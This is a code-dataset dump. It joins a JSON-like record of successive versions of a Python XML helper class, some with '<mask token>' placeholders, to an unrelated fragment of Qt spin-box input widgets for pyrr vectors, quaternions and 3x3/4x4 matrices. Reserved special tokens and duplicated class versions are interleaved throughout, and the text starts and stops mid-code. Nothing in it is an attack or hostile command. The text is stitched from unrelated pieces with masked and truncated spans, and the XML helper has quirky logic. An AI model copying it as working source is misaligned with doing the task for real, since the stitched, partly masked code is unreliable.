2]\n nodeFlag2 = nodeFlag2[1:len(nodeFlag2) - 2]\n nodeFlag1 = nodeFlag1.replace('/', '')\n nodeFlag2 = nodeFlag2.replace('/', '')\n if nodeFlag1 == nodeFlag2:\n return True\n return False\n\n def __fetchNodeNameFromStr(self, str):\n str = str[1:len(str) - 1]\n nodeName = str.replace('/', '')\n return nodeName\n\n def modifyNodeValue(self, node, newValue, isAppend=False):\n if node == None:\n return False\n else:\n try:\n if isAppend:\n node.text += newValue\n else:\n node.text = newValue\n return True\n except:\n return False\n\n def writeXml(self, nodeTree, outPath, charset='utf-8'):\n global _exception\n _exception = None\n try:\n nodeTree.write(outPath, encoding=charset)\n return True\n except BaseException as error:\n _exception = error\n return False\n",
"step-4": "<mask token>\n_exception = None\n<mask token>\n\n\nclass xmlSp:\n\n def addNode(self, parentNode, childNode):\n parentNode.append(childNode)\n\n def createChildNode(self, key, value, propertyMap={}):\n element = Element(key, propertyMap)\n element.text = value\n return element\n\n def fetchXmlNodeTree(self, xmlPathOrXmlStr):\n if xmlPathOrXmlStr == '':\n return None\n elif os.path.isfile(xmlPathOrXmlStr):\n return ElementTree.parse(xmlPathOrXmlStr)\n else:\n return ElementTree.fromstring(xmlPathOrXmlStr)\n\n def fetchSingleNode(self, nodeTree, xpathOrKey):\n if xpathOrKey == None or xpathOrKey == '':\n return None\n elif len(xpathOrKey.split('/')) > 1:\n return nodeTree.find(xpathOrKey)\n else:\n nodeList = nodeTree.getiterator(xpathOrKey)\n if nodeList == None or len(nodeList) <= 0:\n return nodeList\n else:\n return nodeList[0]\n\n def fetchSingleNodeValue(self, nodeTree, xpathOrKey):\n node = self.fetchSingleNode(nodeTree, xpathOrKey)\n if node == None or len(node) <= 0 or node == '':\n return ''\n else:\n return node.text\n\n def fetchNodeList(self, nodeTree, xpathOrKey):\n if xpathOrKey == None or xpathOrKey == '':\n return None\n elif len(xpathOrKey.split('/')) > 1:\n return nodeTree.findall(xpathOrKey)\n else:\n return nodeTree.getiterator(xpathOrKey)\n\n def fetchNodeValueList(self, nodeTree, xpathOrKey, key=''):\n if xpathOrKey == None or xpathOrKey == '':\n return None\n else:\n nodeValueList = []\n nodeList = self.fetchNodeList(nodeTree, xpathOrKey)\n for node in nodeList:\n if node.tag == xpathOrKey:\n nodeValueList.append(node.text)\n return nodeValueList\n\n def format(self, sourceXmlPath, destXmlPath, charset='UTF-8'):\n global _exception\n _exception = None\n if os.path.exists(sourceXmlPath):\n try:\n fileRead = open(sourceXmlPath, 'r', encoding=charset)\n fileWrite = open(destXmlPath, 'w', encoding=charset)\n lines = fileRead.read()\n nodeList = []\n self.__writeXmlStruct(lines, nodeList, fileWrite)\n fileRead.close()\n 
fileWrite.close()\n return True\n except BaseException as error:\n _exception = error\n return False\n else:\n _exception = BaseException('File not exist!')\n return False\n\n def __writeXmlStruct(self, xmlStr, nodeList, fileWrite):\n xmlStr = xmlStr.replace('\\n', '')\n xmlStruct1 = self.__analyNodeFlag(xmlStr)\n if xmlStruct1 != None:\n xmlNode1 = xmlStruct1[0]\n xmlRestStr1 = xmlStruct1[1]\n xmlStruct2 = self.__analyNodeFlag(xmlRestStr1)\n xmlNode2 = xmlStruct2[0]\n xmlRestStr2 = xmlStruct2[1]\n xmlInnerTextEnd = xmlRestStr1.find(xmlNode2)\n xmlInnerText = xmlRestStr1[:xmlInnerTextEnd]\n isPair = self.__checkNodeFlagIsPair(xmlNode1, xmlNode2)\n nodeName1 = self.__fetchNodeNameFromStr(xmlNode1)\n nodeName2 = self.__fetchNodeNameFromStr(xmlNode2)\n if not nodeName1 in nodeList:\n nodeList.append(nodeName1)\n if not nodeName2 in nodeList:\n nodeList.append(nodeName2)\n nodeName1Floor = nodeList.index(nodeName1, 0)\n nodeName2Floor = nodeList.index(nodeName2, 0)\n space = ''\n if len(xmlNode1) > 0:\n if isPair:\n for index in range(nodeName1Floor):\n xmlNode1 = space + xmlNode1\n fileWrite.write(xmlNode1 + '\\n')\n if len(xmlInnerText) > 0:\n if isPair:\n for index in range(nodeName1Floor + 1):\n xmlInnerText = space + xmlInnerText\n fileWrite.write(xmlInnerText + '\\n')\n if len(xmlNode2) > 0:\n for index in range(nodeName2Floor):\n xmlNode2 = space + xmlNode2\n fileWrite.write(xmlNode2 + '\\n')\n self.__writeXmlStruct(xmlRestStr2, nodeList, fileWrite)\n\n def __analyNodeFlag(self, sourceStr):\n global _exception\n _exception = None\n try:\n nodeBegin = sourceStr.find('<')\n nodeEnd = str(sourceStr).find('>')\n if nodeBegin >= 0 and nodeEnd > 0:\n node = sourceStr[nodeBegin:nodeEnd + 1]\n nodeInnerText = sourceStr[nodeEnd + 1:]\n return [node, nodeInnerText]\n else:\n return ['', sourceStr]\n except BaseException as error:\n _exception = error\n return None\n\n def __checkNodeFlagIsPair(self, nodeFlag1, nodeFlag2):\n if len(nodeFlag1) > 0 and len(nodeFlag2) > 0:\n 
nodeFlag1 = nodeFlag1[1:len(nodeFlag1) - 2]\n nodeFlag2 = nodeFlag2[1:len(nodeFlag2) - 2]\n nodeFlag1 = nodeFlag1.replace('/', '')\n nodeFlag2 = nodeFlag2.replace('/', '')\n if nodeFlag1 == nodeFlag2:\n return True\n return False\n\n def __fetchNodeNameFromStr(self, str):\n str = str[1:len(str) - 1]\n nodeName = str.replace('/', '')\n return nodeName\n\n def modifyNodeValue(self, node, newValue, isAppend=False):\n if node == None:\n return False\n else:\n try:\n if isAppend:\n node.text += newValue\n else:\n node.text = newValue\n return True\n except:\n return False\n\n def writeXml(self, nodeTree, outPath, charset='utf-8'):\n global _exception\n _exception = None\n try:\n nodeTree.write(outPath, encoding=charset)\n return True\n except BaseException as error:\n _exception = error\n return False\n",
"step-5": "#-*- coding:utf-8 -*-\n\nfrom xml.etree import ElementTree\nfrom xml.etree.ElementTree import Element \n\n_exception = None\n\nimport os\nclass xmlSp: \n def addNode(self,parentNode,childNode): \n parentNode.append(childNode) \n \n def createChildNode(self,key,value,propertyMap={}):\n element = Element(key,propertyMap) \n element.text = value \n return element\n\n def fetchXmlNodeTree(self,xmlPathOrXmlStr):#Load xml has 2 ways.First:load xml string.Second:load xml file. \n if(xmlPathOrXmlStr == \"\"):\n return None\n elif(os.path.isfile(xmlPathOrXmlStr)):#is xmlPath\n return ElementTree.parse(xmlPathOrXmlStr)\n else:#is xmlStr\n return ElementTree.fromstring(xmlPathOrXmlStr) \n\n def fetchSingleNode(self,nodeTree,xpathOrKey):#If the node that is same name is more,return first node. \n if xpathOrKey == None or xpathOrKey == \"\":\n return None\n elif len(xpathOrKey.split('/')) > 1:#is xpath \n return nodeTree.find(xpathOrKey)#find is faster than findall then return first\n else:#is key\n nodeList = nodeTree.getiterator(xpathOrKey)\n if nodeList == None or len(nodeList) <= 0:\n return nodeList\n else:\n return nodeList[0]\n\n def fetchSingleNodeValue(self,nodeTree,xpathOrKey):#If the node that is same name is more,return first node. 
\n node = self.fetchSingleNode(nodeTree,xpathOrKey)\n if node == None or len(node) <= 0 or node == \"\":\n return \"\"\n else:\n return node.text\n\n def fetchNodeList(self,nodeTree,xpathOrKey):\n if xpathOrKey == None or xpathOrKey == \"\":\n return None\n elif len(xpathOrKey.split('/')) > 1:#is xpath\n return nodeTree.findall(xpathOrKey)\n else:#is key\n return nodeTree.getiterator(xpathOrKey)\n\n def fetchNodeValueList(self,nodeTree,xpathOrKey,key=\"\"):#If xpathOrKey is xpath,key must be not empty.Otherwise return empty set \n if xpathOrKey == None or xpathOrKey == \"\":\n return None\n else:\n nodeValueList = [] \n nodeList = self.fetchNodeList(nodeTree,xpathOrKey)\n for node in nodeList:\n if node.tag == xpathOrKey:\n nodeValueList.append(node.text)\n return nodeValueList \n\n def format(self,sourceXmlPath,destXmlPath,charset='UTF-8'): \n global _exception \n _exception = None\n if os.path.exists(sourceXmlPath):\n try:\n fileRead = open(sourceXmlPath,'r',encoding=charset)\n fileWrite = open(destXmlPath,'w',encoding=charset) \n lines = fileRead.read() \n nodeList=[] \n self.__writeXmlStruct(lines,nodeList,fileWrite) \n fileRead.close()\n fileWrite.close() \n return True\n except BaseException as error:\n _exception = error\n return False\n else:\n _exception = BaseException('File not exist!')\n return False\n def __writeXmlStruct(self,xmlStr,nodeList,fileWrite): \n xmlStr=xmlStr.replace('\\n','') \n xmlStruct1=self.__analyNodeFlag(xmlStr) \n if xmlStruct1!=None:\n xmlNode1=xmlStruct1[0]\n xmlRestStr1=xmlStruct1[1]\n xmlStruct2=self.__analyNodeFlag(xmlRestStr1)\n xmlNode2=xmlStruct2[0]\n xmlRestStr2=xmlStruct2[1]\n xmlInnerTextEnd=xmlRestStr1.find(xmlNode2)\n xmlInnerText=xmlRestStr1[:xmlInnerTextEnd]\n isPair=self.__checkNodeFlagIsPair(xmlNode1,xmlNode2)\n nodeName1=self.__fetchNodeNameFromStr(xmlNode1)\n nodeName2=self.__fetchNodeNameFromStr(xmlNode2)\n if not (nodeName1 in nodeList):\n nodeList.append(nodeName1)\n if not (nodeName2 in nodeList):\n 
nodeList.append(nodeName2)\n nodeName1Floor=nodeList.index(nodeName1,0)\n nodeName2Floor=nodeList.index(nodeName2,0) \n space=''\n if len(xmlNode1)>0: \n if isPair:\n for index in range(nodeName1Floor):\n xmlNode1=space+xmlNode1 \n fileWrite.write(xmlNode1+'\\n') \n if len(xmlInnerText)>0:\n if isPair:\n for index in range(nodeName1Floor+1):\n xmlInnerText=space+xmlInnerText\n fileWrite.write(xmlInnerText+'\\n')\n if len(xmlNode2)>0: \n for index in range(nodeName2Floor):\n xmlNode2=space+xmlNode2\n fileWrite.write(xmlNode2+'\\n') \n self.__writeXmlStruct(xmlRestStr2,nodeList,fileWrite) \n def __analyNodeFlag(self,sourceStr): \n global _exception\n _exception=None\n try: \n nodeBegin = sourceStr.find('<') \n nodeEnd = str(sourceStr).find('>') \n if nodeBegin >= 0 and nodeEnd > 0:\n node =sourceStr[nodeBegin:nodeEnd+1] \n nodeInnerText=sourceStr[nodeEnd+1:]\n return [node,nodeInnerText]\n else:\n return [\"\",sourceStr]\n except BaseException as error:\n _exception=error\n return None\n def __checkNodeFlagIsPair(self,nodeFlag1,nodeFlag2):\n if len(nodeFlag1)>0 and len(nodeFlag2)>0:\n nodeFlag1=nodeFlag1[1:(len(nodeFlag1)-2)]\n nodeFlag2=nodeFlag2[1:(len(nodeFlag2)-2)]\n nodeFlag1=nodeFlag1.replace('/','')\n nodeFlag2=nodeFlag2.replace('/','')\n if nodeFlag1==nodeFlag2:\n return True \n return False\n\n def __fetchNodeNameFromStr(self,str):\n str=str[1:(len(str)-1)]\n nodeName=str.replace('/','')\n return nodeName\n \n def modifyNodeValue(self,node,newValue, isAppend=False):\n if(node == None):\n return False\n else:\n try:\n if isAppend: \n node.text += newValue \n else: \n node.text = newValue \n return True \n except:\n return False\n\n def writeXml(self,nodeTree, outPath,charset=\"utf-8\"): \n global _exception\n _exception=None\n try:\n nodeTree.write(outPath, encoding=charset)\n return True\n except BaseException as error:\n _exception=error\n return False\n\n#import os \n#if __name__ == '__main__': \n# myxml = xmlSp() \n# formatResult = 
myxml.format(\"1.txt\",\"2.txt\")\n# if not formatResult:\n# print(_exception)\n# else:\n# os.remove(\"1.txt\")\n# os.rename('2.txt','1.txt')\n \n## xmlPath= \"..\\\\article\\\\articleList.xml\";\n## nodeTree = myxml.fetchXmlNodeTree(xmlPath)\n## #nodeTree=\n## #myxml.fetchXmlNodeTree(\"<artilceList><article><id>aaaa</id></article></artilceList>\")\n## #node=myxml.fetchSingleNode(nodeTree,'article/id')\n## #if len(node)<=0:\n## # print(\"empty\")\n## #print(node)\n## #nodeList = myxml.fetchNodeList(nodeTree,'id')\n## #myxml.modifyNodeValue(nodeList[0],'bbbb')\n## #myxml.writeXml(nodeTree,xmlPath)\n## #rootNode=myxml.fetchSingleNode(nodeTree,'articleList')\n## #idNode=myxml.createChildNode('id','aaabbbb')\n## #nameNode=myxml.createChildNode('name','aaabbbb')\n## #parentNode=myxml.createChildNode('article','')\n## #myxml.addNode(parentNode,idNode)\n## #myxml.addNode(parentNode,nameNode)\n## #myxml.addNode(rootNode,parentNode)\n## #myxml.writeXml(nodeTree,'aaa.xml')\n## #for node in nodeList:\n## # print(\"node:%s\" %node)\n## #nodeValueSet=fetchNodeValueSet(nodeTree,'article/id')\n## #for nodeValue in nodeValueSet:\n## # print (\"nodeValue:%s\" %nodeValue)\n#import os\n#os.system(\"PAUSE\")\n",
"step-ids": [
12,
13,
15,
16,
18
]
}
|
[
12,
13,
15,
16,
18
] |
<|reserved_special_token_0|>
class FloatVector3InputWidget(InputWidgetRaw, FloatVector3InputWidget_ui.Ui_Form):
    """Vector3 data input widget: three float spin boxes (x, y, z)."""

    def __init__(self, **kwds):
        super(FloatVector3InputWidget, self).__init__(**kwds)
        self.setupUi(self)
        self._configSpinBoxes()
        # Each spin box updates only its own component of the vector.
        self.dsbX.valueChanged.connect(self._onDataChangedX)
        self.dsbY.valueChanged.connect(self._onDataChangedY)
        self.dsbZ.valueChanged.connect(self._onDataChangedZ)
        self.pbReset.clicked.connect(self.onResetValue)

    def asDataTypeClass(self):
        """Return the current widget state as a ``pyrr.Vector3``."""
        return pyrr.Vector3([self.dsbX.value(), self.dsbY.value(), self.dsbZ.value()])

    def _configSpinBoxes(self):
        """Apply the shared float precision/range/step settings to every spin box."""
        # The three boxes were configured with nine copy-pasted lines; one
        # loop keeps the settings guaranteed-identical.
        for sb in (self.dsbX, self.dsbY, self.dsbZ):
            sb.setDecimals(FLOAT_DECIMALS)
            sb.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
            sb.setSingleStep(FLOAT_SINGLE_STEP)

    def _emitComponent(self, component, val):
        """Write *val* into one component of the current vector and push it to the data callback."""
        v = self.asDataTypeClass()
        setattr(v, component, val)
        self.dataSetCallback(v)

    def _onDataChangedX(self, val):
        self._emitComponent('x', val)

    def _onDataChangedY(self, val):
        self._emitComponent('y', val)

    def _onDataChangedZ(self, val):
        self._emitComponent('z', val)

    def setWidgetValue(self, val):
        """Reflect *val* (a Vector3-like object with .x/.y/.z) into the spin boxes."""
        self.dsbX.setValue(val.x)
        self.dsbY.setValue(val.y)
        self.dsbZ.setValue(val.z)
class FloatVector4InputWidget(InputWidgetRaw, FloatVector4InputWidget_ui.Ui_Form):
    """Vector4 data input widget: four float spin boxes (x, y, z, w)."""

    def __init__(self, **kwds):
        super(FloatVector4InputWidget, self).__init__(**kwds)
        self.setupUi(self)
        self._configSpinBoxes()
        # Each spin box updates only its own component of the vector.
        self.dsbX.valueChanged.connect(self._onDataChangedX)
        self.dsbY.valueChanged.connect(self._onDataChangedY)
        self.dsbZ.valueChanged.connect(self._onDataChangedZ)
        self.dsbW.valueChanged.connect(self._onDataChangedW)
        self.pbReset.clicked.connect(self.onResetValue)

    def asDataTypeClass(self):
        """Return the current widget state as a ``pyrr.Vector4``."""
        return pyrr.Vector4([self.dsbX.value(), self.dsbY.value(),
                             self.dsbZ.value(), self.dsbW.value()])

    def _configSpinBoxes(self):
        """Apply the shared float range/step/precision settings to every spin box."""
        # The four boxes were configured with twelve copy-pasted lines; one
        # loop keeps the settings guaranteed-identical.
        for sb in (self.dsbX, self.dsbY, self.dsbZ, self.dsbW):
            sb.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
            sb.setSingleStep(FLOAT_SINGLE_STEP)
            sb.setDecimals(FLOAT_DECIMALS)

    def _emitComponent(self, component, val):
        """Write *val* into one component of the current vector and push it to the data callback."""
        v = self.asDataTypeClass()
        setattr(v, component, val)
        self.dataSetCallback(v)

    def _onDataChangedX(self, val):
        self._emitComponent('x', val)

    def _onDataChangedY(self, val):
        self._emitComponent('y', val)

    def _onDataChangedZ(self, val):
        self._emitComponent('z', val)

    def _onDataChangedW(self, val):
        self._emitComponent('w', val)

    def setWidgetValue(self, val):
        """Reflect *val* (a Vector4-like object with .x/.y/.z/.w) into the spin boxes."""
        self.dsbX.setValue(val.x)
        self.dsbY.setValue(val.y)
        self.dsbZ.setValue(val.z)
        self.dsbW.setValue(val.w)
class QuatInputWidget(FloatVector4InputWidget):
    """Quaternion data input widget (reuses the four-component float editor)."""

    def __init__(self, **kwds):
        super(QuatInputWidget, self).__init__(**kwds)

    def asDataTypeClass(self):
        """Return the current widget state as a ``pyrr.Quaternion`` (x, y, z, w)."""
        components = [self.dsbX.value(), self.dsbY.value(),
                      self.dsbZ.value(), self.dsbW.value()]
        return pyrr.Quaternion(components)
class Matrix33InputWidget(InputWidgetRaw, Matrix33InputWidget_ui.Ui_Form):
    """Matrix33 data input widget: a 3x3 grid of float spin boxes."""

    # Cell names in row-major order; spin boxes are named 'dsb' + cell.
    _CELLS = ('m11', 'm12', 'm13', 'm21', 'm22', 'm23', 'm31', 'm32', 'm33')

    def __init__(self, parent=None, **kwds):
        super(Matrix33InputWidget, self).__init__(parent=parent, **kwds)
        self.setupUi(self)
        self._configSpinBoxes()
        # Connect every cell's spin box to its matching mXXChanged slot
        # (replaces nine copy-pasted connect calls).
        for cell in self._CELLS:
            getattr(self, 'dsb' + cell).valueChanged.connect(getattr(self, cell + 'Changed'))
        self.pbReset.clicked.connect(self.onResetValue)

    def _spinBoxes(self):
        """Return the nine spin boxes in cell order."""
        return [getattr(self, 'dsb' + cell) for cell in self._CELLS]

    def asDataTypeClass(self):
        """Return the current widget state as a ``pyrr.Matrix33``."""
        return pyrr.Matrix33([
            [self.dsbm11.value(), self.dsbm12.value(), self.dsbm13.value()],
            [self.dsbm21.value(), self.dsbm22.value(), self.dsbm23.value()],
            [self.dsbm31.value(), self.dsbm32.value(), self.dsbm33.value()],
        ])

    def _configSpinBoxes(self):
        """Apply the shared float range/step/precision settings to every cell."""
        for sb in self._spinBoxes():
            sb.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
            sb.setSingleStep(FLOAT_SINGLE_STEP)
            sb.setDecimals(FLOAT_DECIMALS)

    def _cellChanged(self, cell, val):
        """Write *val* into one matrix cell and push the result to the data callback."""
        m = self.asDataTypeClass()
        setattr(m, cell, val)
        self.dataSetCallback(m)

    # The nine public slots are kept (they are part of the widget's
    # interface) but now all delegate to _cellChanged.
    def m11Changed(self, val):
        self._cellChanged('m11', val)

    def m12Changed(self, val):
        self._cellChanged('m12', val)

    def m13Changed(self, val):
        self._cellChanged('m13', val)

    def m21Changed(self, val):
        self._cellChanged('m21', val)

    def m22Changed(self, val):
        self._cellChanged('m22', val)

    def m23Changed(self, val):
        self._cellChanged('m23', val)

    def m31Changed(self, val):
        self._cellChanged('m31', val)

    def m32Changed(self, val):
        self._cellChanged('m32', val)

    def m33Changed(self, val):
        self._cellChanged('m33', val)

    def setWidgetValue(self, val):
        """Reflect *val* (a Matrix33-like object with .m11..m33) into the spin boxes."""
        for cell, sb in zip(self._CELLS, self._spinBoxes()):
            sb.setValue(getattr(val, cell))
class Matrix44InputWidget(InputWidgetRaw, Matrix44InputWidget_ui.Ui_Form):
    """Input widget that edits a pyrr.Matrix44 through a 4x4 spin box grid."""

    def __init__(self, parent=None, **kwds):
        super(Matrix44InputWidget, self).__init__(parent=parent, **kwds)
        self.setupUi(self)
        self._configSpinBoxes()
        # Wire every cell's spin box to its dedicated change handler.
        for row in (1, 2, 3, 4):
            for col in (1, 2, 3, 4):
                spinBox = getattr(self, 'dsbm{}{}'.format(row, col))
                handler = getattr(self, 'm{}{}Changed'.format(row, col))
                spinBox.valueChanged.connect(handler)
        self.pbReset.clicked.connect(self.onResetValue)

    def asDataTypeClass(self):
        """Build a pyrr.Matrix44 from the current spin box values."""
        rows = []
        for row in (1, 2, 3, 4):
            rows.append([getattr(self, 'dsbm{}{}'.format(row, col)).value()
                         for col in (1, 2, 3, 4)])
        return pyrr.Matrix44(rows)

    def _configSpinBoxes(self):
        # Shared range/step/precision for every cell in the grid.
        for row in (1, 2, 3, 4):
            for col in (1, 2, 3, 4):
                box = getattr(self, 'dsbm{}{}'.format(row, col))
                box.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
                box.setSingleStep(FLOAT_SINGLE_STEP)
                box.setDecimals(FLOAT_DECIMALS)

    def _componentChanged(self, attr, val):
        # Rebuild the matrix from the UI, then overwrite the edited cell.
        matrix = self.asDataTypeClass()
        setattr(matrix, attr, val)
        self.dataSetCallback(matrix)

    def m11Changed(self, val):
        self._componentChanged('m11', val)

    def m12Changed(self, val):
        self._componentChanged('m12', val)

    def m13Changed(self, val):
        self._componentChanged('m13', val)

    def m14Changed(self, val):
        self._componentChanged('m14', val)

    def m21Changed(self, val):
        self._componentChanged('m21', val)

    def m22Changed(self, val):
        self._componentChanged('m22', val)

    def m23Changed(self, val):
        self._componentChanged('m23', val)

    def m24Changed(self, val):
        self._componentChanged('m24', val)

    def m31Changed(self, val):
        self._componentChanged('m31', val)

    def m32Changed(self, val):
        self._componentChanged('m32', val)

    def m33Changed(self, val):
        self._componentChanged('m33', val)

    def m34Changed(self, val):
        self._componentChanged('m34', val)

    def m41Changed(self, val):
        self._componentChanged('m41', val)

    def m42Changed(self, val):
        self._componentChanged('m42', val)

    def m43Changed(self, val):
        self._componentChanged('m43', val)

    def m44Changed(self, val):
        self._componentChanged('m44', val)

    def setWidgetValue(self, val):
        """Mirror every component of *val* into its spin box."""
        for row in (1, 2, 3, 4):
            for col in (1, 2, 3, 4):
                name = 'm{}{}'.format(row, col)
                getattr(self, 'dsb' + name).setValue(getattr(val, name))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class FloatVector3InputWidget(InputWidgetRaw, FloatVector3InputWidget_ui.Ui_Form):
    """Input widget that edits a pyrr.Vector3 through three spin boxes."""

    def __init__(self, **kwds):
        super(FloatVector3InputWidget, self).__init__(**kwds)
        self.setupUi(self)
        self._configSpinBoxes()
        # Each axis pushes a full vector with only its own component replaced.
        self.dsbX.valueChanged.connect(self._onDataChangedX)
        self.dsbY.valueChanged.connect(self._onDataChangedY)
        self.dsbZ.valueChanged.connect(self._onDataChangedZ)
        self.pbReset.clicked.connect(self.onResetValue)

    def asDataTypeClass(self):
        """Build a pyrr.Vector3 from the current spin box values."""
        return pyrr.Vector3([box.value() for box in
                             (self.dsbX, self.dsbY, self.dsbZ)])

    def _configSpinBoxes(self):
        # Shared precision/range/step configuration for every axis.
        for box in (self.dsbX, self.dsbY, self.dsbZ):
            box.setDecimals(FLOAT_DECIMALS)
            box.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
            box.setSingleStep(FLOAT_SINGLE_STEP)

    def _onDataChangedX(self, val):
        vec = self.asDataTypeClass()
        vec.x = val
        self.dataSetCallback(vec)

    def _onDataChangedY(self, val):
        vec = self.asDataTypeClass()
        vec.y = val
        self.dataSetCallback(vec)

    def _onDataChangedZ(self, val):
        vec = self.asDataTypeClass()
        vec.z = val
        self.dataSetCallback(vec)

    def setWidgetValue(self, val):
        """Mirror *val*'s components into the spin boxes."""
        self.dsbX.setValue(val.x)
        self.dsbY.setValue(val.y)
        self.dsbZ.setValue(val.z)
class FloatVector4InputWidget(InputWidgetRaw, FloatVector4InputWidget_ui.Ui_Form):
    """Input widget that edits a pyrr.Vector4 through four spin boxes."""

    def __init__(self, **kwds):
        super(FloatVector4InputWidget, self).__init__(**kwds)
        self.setupUi(self)
        self._configSpinBoxes()
        # Each axis pushes a full vector with only its own component replaced.
        self.dsbX.valueChanged.connect(self._onDataChangedX)
        self.dsbY.valueChanged.connect(self._onDataChangedY)
        self.dsbZ.valueChanged.connect(self._onDataChangedZ)
        self.dsbW.valueChanged.connect(self._onDataChangedW)
        self.pbReset.clicked.connect(self.onResetValue)

    def asDataTypeClass(self):
        """Build a pyrr.Vector4 from the current spin box values."""
        return pyrr.Vector4([box.value() for box in
                             (self.dsbX, self.dsbY, self.dsbZ, self.dsbW)])

    def _configSpinBoxes(self):
        # Shared range/step/precision configuration for every axis.
        for box in (self.dsbX, self.dsbY, self.dsbZ, self.dsbW):
            box.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
            box.setSingleStep(FLOAT_SINGLE_STEP)
            box.setDecimals(FLOAT_DECIMALS)

    def _onDataChangedX(self, val):
        vec = self.asDataTypeClass()
        vec.x = val
        self.dataSetCallback(vec)

    def _onDataChangedY(self, val):
        vec = self.asDataTypeClass()
        vec.y = val
        self.dataSetCallback(vec)

    def _onDataChangedZ(self, val):
        vec = self.asDataTypeClass()
        vec.z = val
        self.dataSetCallback(vec)

    def _onDataChangedW(self, val):
        vec = self.asDataTypeClass()
        vec.w = val
        self.dataSetCallback(vec)

    def setWidgetValue(self, val):
        """Mirror *val*'s components into the spin boxes."""
        self.dsbX.setValue(val.x)
        self.dsbY.setValue(val.y)
        self.dsbZ.setValue(val.z)
        self.dsbW.setValue(val.w)
class QuatInputWidget(FloatVector4InputWidget):
    """Input widget that edits a pyrr.Quaternion (x, y, z, w)."""

    def __init__(self, **kwds):
        super(QuatInputWidget, self).__init__(**kwds)

    def asDataTypeClass(self):
        """Build a pyrr.Quaternion from the current spin box values."""
        components = [box.value() for box in
                      (self.dsbX, self.dsbY, self.dsbZ, self.dsbW)]
        return pyrr.Quaternion(components)
class Matrix33InputWidget(InputWidgetRaw, Matrix33InputWidget_ui.Ui_Form):
    """Input widget that edits a pyrr.Matrix33 through a 3x3 spin box grid."""

    def __init__(self, parent=None, **kwds):
        super(Matrix33InputWidget, self).__init__(parent=parent, **kwds)
        self.setupUi(self)
        self._configSpinBoxes()
        # Wire every cell's spin box to its dedicated change handler.
        for row in (1, 2, 3):
            for col in (1, 2, 3):
                spinBox = getattr(self, 'dsbm{}{}'.format(row, col))
                handler = getattr(self, 'm{}{}Changed'.format(row, col))
                spinBox.valueChanged.connect(handler)
        self.pbReset.clicked.connect(self.onResetValue)

    def asDataTypeClass(self):
        """Build a pyrr.Matrix33 from the current spin box values."""
        rows = []
        for row in (1, 2, 3):
            rows.append([getattr(self, 'dsbm{}{}'.format(row, col)).value()
                         for col in (1, 2, 3)])
        return pyrr.Matrix33(rows)

    def _configSpinBoxes(self):
        # Shared range/step/precision for every cell in the grid.
        for row in (1, 2, 3):
            for col in (1, 2, 3):
                box = getattr(self, 'dsbm{}{}'.format(row, col))
                box.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
                box.setSingleStep(FLOAT_SINGLE_STEP)
                box.setDecimals(FLOAT_DECIMALS)

    def _componentChanged(self, attr, val):
        # Rebuild the matrix from the UI, then overwrite the edited cell.
        matrix = self.asDataTypeClass()
        setattr(matrix, attr, val)
        self.dataSetCallback(matrix)

    def m11Changed(self, val):
        self._componentChanged('m11', val)

    def m12Changed(self, val):
        self._componentChanged('m12', val)

    def m13Changed(self, val):
        self._componentChanged('m13', val)

    def m21Changed(self, val):
        self._componentChanged('m21', val)

    def m22Changed(self, val):
        self._componentChanged('m22', val)

    def m23Changed(self, val):
        self._componentChanged('m23', val)

    def m31Changed(self, val):
        self._componentChanged('m31', val)

    def m32Changed(self, val):
        self._componentChanged('m32', val)

    def m33Changed(self, val):
        self._componentChanged('m33', val)

    def setWidgetValue(self, val):
        """Mirror every component of *val* into its spin box."""
        for row in (1, 2, 3):
            for col in (1, 2, 3):
                name = 'm{}{}'.format(row, col)
                getattr(self, 'dsb' + name).setValue(getattr(val, name))
class Matrix44InputWidget(InputWidgetRaw, Matrix44InputWidget_ui.Ui_Form):
    """Input widget that edits a pyrr.Matrix44 through a 4x4 spin box grid."""

    def __init__(self, parent=None, **kwds):
        super(Matrix44InputWidget, self).__init__(parent=parent, **kwds)
        self.setupUi(self)
        self._configSpinBoxes()
        # Wire every cell's spin box to its dedicated change handler.
        for row in (1, 2, 3, 4):
            for col in (1, 2, 3, 4):
                spinBox = getattr(self, 'dsbm{}{}'.format(row, col))
                handler = getattr(self, 'm{}{}Changed'.format(row, col))
                spinBox.valueChanged.connect(handler)
        self.pbReset.clicked.connect(self.onResetValue)

    def asDataTypeClass(self):
        """Build a pyrr.Matrix44 from the current spin box values."""
        rows = []
        for row in (1, 2, 3, 4):
            rows.append([getattr(self, 'dsbm{}{}'.format(row, col)).value()
                         for col in (1, 2, 3, 4)])
        return pyrr.Matrix44(rows)

    def _configSpinBoxes(self):
        # Shared range/step/precision for every cell in the grid.
        for row in (1, 2, 3, 4):
            for col in (1, 2, 3, 4):
                box = getattr(self, 'dsbm{}{}'.format(row, col))
                box.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
                box.setSingleStep(FLOAT_SINGLE_STEP)
                box.setDecimals(FLOAT_DECIMALS)

    def _componentChanged(self, attr, val):
        # Rebuild the matrix from the UI, then overwrite the edited cell.
        matrix = self.asDataTypeClass()
        setattr(matrix, attr, val)
        self.dataSetCallback(matrix)

    def m11Changed(self, val):
        self._componentChanged('m11', val)

    def m12Changed(self, val):
        self._componentChanged('m12', val)

    def m13Changed(self, val):
        self._componentChanged('m13', val)

    def m14Changed(self, val):
        self._componentChanged('m14', val)

    def m21Changed(self, val):
        self._componentChanged('m21', val)

    def m22Changed(self, val):
        self._componentChanged('m22', val)

    def m23Changed(self, val):
        self._componentChanged('m23', val)

    def m24Changed(self, val):
        self._componentChanged('m24', val)

    def m31Changed(self, val):
        self._componentChanged('m31', val)

    def m32Changed(self, val):
        self._componentChanged('m32', val)

    def m33Changed(self, val):
        self._componentChanged('m33', val)

    def m34Changed(self, val):
        self._componentChanged('m34', val)

    def m41Changed(self, val):
        self._componentChanged('m41', val)

    def m42Changed(self, val):
        self._componentChanged('m42', val)

    def m43Changed(self, val):
        self._componentChanged('m43', val)

    def m44Changed(self, val):
        self._componentChanged('m44', val)

    def setWidgetValue(self, val):
        """Mirror every component of *val* into its spin box."""
        for row in (1, 2, 3, 4):
